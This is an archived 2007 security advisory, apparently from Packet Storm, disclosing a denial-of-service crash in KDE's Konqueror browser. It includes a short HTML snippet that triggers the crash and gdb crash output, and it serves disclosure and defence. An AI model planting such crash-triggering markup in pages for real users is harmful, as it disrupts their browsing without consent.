what you don't know can hurt you

kde357-dos.txt

kde357-dos.txt
Posted Aug 8, 2007
Authored by Thomas Waldegger | Site buha.info

KDE's Konqueror versions 3.5.7 and below suffer from a denial of service vulnerability.

tags | advisory, denial of service
MD5 | 40a2b81559278a98990ee22636d8c909

kde357-dos.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

---------------------------------------------------
| BuHa Security-Advisory #16 | Aug 01st, 2007 |
---------------------------------------------------
| Vendor | KDE's Konqueror |
| URL | http://www.konqueror.org/ |
| Version | <= 3.5.7 |
| Risk | Low (Denial Of Service) |
---------------------------------------------------

o Description:
=============

Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.

Visit http://www.konqueror.org/ for detailed information.

o Denial of Service:
===================

Following HTML code forces Konqueror to crash:
> <textarea></button></textarea></br><bdo dir="">
> <pre><frameset>
> <a>

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

> (gdb) set args konqueror.html
> (gdb) r
> Starting program: /usr/bin/konqueror konqueror.html
> (no debugging symbols found)
> [...]
> [Thread debugging using libthread_db enabled]
> [New Thread -1234381104 (LWP 5982)]
> (no debugging symbols found)
> [...]
> Qt: gdb: -nograb added to command-line options.
> Use the -dograb option to enforce grabbing.
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> (no debugging symbols found)
> [...]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1234381104 (LWP 5982)]
> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.

I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and when commenting out the assert the backtrace ends in:

> #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
> #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
> obj=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable.

o Disclosure Timeline:
=====================

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:
==========

There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.

o Credits:
=========

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16
WHuq7rPUBPx1/5nx+jJUPDg=
=R4ZU
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close